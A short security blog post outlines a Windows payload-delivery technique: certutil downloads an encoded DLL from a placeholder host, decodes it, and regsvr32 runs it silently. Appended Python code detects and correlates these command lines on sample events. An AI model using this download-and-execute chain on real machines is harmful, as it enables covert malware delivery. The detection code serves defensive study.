Quick post putting together some Twitter awesomeness.
References:
https://twitter.com/subtee/status/888125678872399873
https://twitter.com/subTee/status/888071631528235010
https://twitter.com/malwaretechblog/status/733651527827623936
Let’s do it
1. Create your DLL
2. Base64-encode it (optional)
3. Pull it down with certutil: certutil.exe -urlcache -split -f http://example/file.txt file.blah
4. Base64-decode the file with certutil
5. Execute the DLL with regsvr32: regsvr32 /s /u mydll.dll
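A detection sketch for steps 3 and 5 above, added here as an example and not part of the original post: it tags process command lines that match the certutil download and the regsvr32 /s /u call, then flags hosts where one follows the other. The event tuple shape, host names, timestamps and the 10-minute window are constructed assumptions.

```python
import re
from datetime import datetime, timedelta

# Switches may be written with '-' or '/', in any letter case.
RULES = {
    # Step 3: certutil fetching a URL through its URL cache.
    "certutil_url_download": re.compile(
        r"\bcertutil(?:\.exe)?\b.*\s[-/]urlcache\b.*\bhttps?://", re.I),
    # Step 5: regsvr32 run with both /s and /u.
    "regsvr32_silent_unregister": re.compile(
        r"\bregsvr32(?:\.exe)?\b(?=.*\s[-/]s\b)(?=.*\s[-/]u\b)", re.I),
}

def classify(cmdline):
    """Return the names of all rules that match one command line."""
    return [name for name, rx in RULES.items() if rx.search(cmdline)]

def correlate(events, window=timedelta(minutes=10)):
    """Flag hosts where a certutil download is followed by regsvr32 /s /u.

    events: iterable of (timestamp, host, command_line) tuples (assumed shape).
    Returns a list of (host, download_time, regsvr32_time).
    """
    last_download, hits = {}, []
    for ts, host, cmd in sorted(events):
        tags = classify(cmd)
        if "certutil_url_download" in tags:
            last_download[host] = ts
        if ("regsvr32_silent_unregister" in tags and host in last_download
                and ts - last_download[host] <= window):
            hits.append((host, last_download[host], ts))
    return hits

# Constructed process-creation events (not real telemetry).
EVENTS = [
    (datetime(2017, 8, 1, 10, 0, 0), "WS01",
     r"certutil.exe -urlcache -split -f http://example/file.txt file.blah"),
    (datetime(2017, 8, 1, 10, 1, 0), "WS01", r"regsvr32 /s /u mydll.dll"),
    (datetime(2017, 8, 1, 11, 0, 0), "WS02", r"certutil.exe -verify server.cer"),
    (datetime(2017, 8, 1, 11, 5, 0), "WS02",
     r"regsvr32.exe /s C:\Windows\System32\msxml6.dll"),
    (datetime(2017, 8, 1, 12, 0, 0), "WS03", r"regsvr32 /s /u old.dll"),
]

if __name__ == "__main__":
    for host, t0, t1 in correlate(EVENTS):
        print(f"{host}: certutil download at {t0}, regsvr32 /s /u at {t1}")
```

Only WS01 is flagged by the correlation; WS03 matches the regsvr32 rule alone, which is why the per-rule tags are kept separate from the sequence check.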
Article Link: http://carnal0wnage.attackresearch.com/2017/08/certutil-for-delivery-of-files.html